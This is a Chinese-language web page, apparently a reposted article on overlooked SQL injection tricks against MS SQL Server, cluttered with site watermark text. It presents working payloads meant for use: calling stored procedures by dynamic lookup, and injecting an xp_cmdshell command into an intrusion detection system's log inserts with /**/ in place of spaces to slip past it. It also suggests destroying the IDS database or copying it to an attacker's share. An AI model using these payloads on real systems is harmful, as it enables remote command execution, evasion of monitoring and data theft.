RSS订阅
PHP程序员站--WWW.PHPERZ.COM  
网站地图
高级搜索
收藏本站

 当前位置:主页 >> PHP基础 >> 基础文章 >> 文章内容
一些容易被忽略的SQL注入技巧
[收藏此页[打印本页]   
来源:互联网  作者:未知  发布时间:2008-01-20


当然也可以:

 

php程序员之家

declare @a sysname select @a=name from sysobjects where id=988455 1 
exec @a 'dir c:\' 

phperz.com

这种做法排列组合,ids根本不可能做的到完全监视。同理,sp_addlogin也可以这么做。 php程序员站

再说说攻击Ids phperz.com

因为Ids数据量很大,日至通常备份到常规数据库,比如sql server。

www~phperz~com

如果用古老的recordset.addnew做法,会严重影响ids的性能,因为通过ado做t-sql请求,不但效率高,而且有一部分工作可以交给sql server 去做,通常程序会这么写:

www~phperz~com

  php程序员站

insert table values ('日至内容',...) phperz.com 

那么我们想想看,如果用 temp') exec xp_cmdshell 'dir c:\' -- 提交后会变成:

www.phperz.com

  www.phperz.com

insert table values ('日至内容'....'temp') exec xp_cmdshell 'dir 
c:\' -- ') 

www.phperz.com

这样,xp_cmdshell就可以在ids的数据库运行了。当然ids是一个嗅叹器,他会抓所有的报,而浏览器提交的时候会把空格变成 。因此, 会被提交到sql server,这样你的命令就无法执行了。 唯一的办法就是:

phperz.com

 

php程序员站

insert/**/table/**/values('日至内容'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ') www.phperz.com 

用/**/代替空格做间隔符,这样你的t-sql才能在ids的数据库内执行。当然也可以用其他语句,可以破坏,备份ids的数据库到你的共享目录。

phperz.com

其实这种方法的原理和攻击asp是一样的,只是把空格变成了/**/ 。本来asp是select语句,那么用'就可以屏蔽。现在ids用insert语句,那么用')屏蔽。 phperz~com

好了,其他很多新的入侵语句大家可以自己慢慢想,最好的测试工具就是query analyzer了。

phperz.com


 
 相关文章
 
发表评论
全部评论(0条)
 
 站内搜索
 热门搜索 基础  mysql  url  adodb
高级搜索 网站地图 站长工具 IP查询 收藏本站
 热点文章
 随机推荐
网站首页 | 网站地图 | 高级搜索 | RSS订阅
PHP程序员站 Copyright © 2007,PHPERZ.COM All Rights Reserved 粤ICP备07503606号 联系站长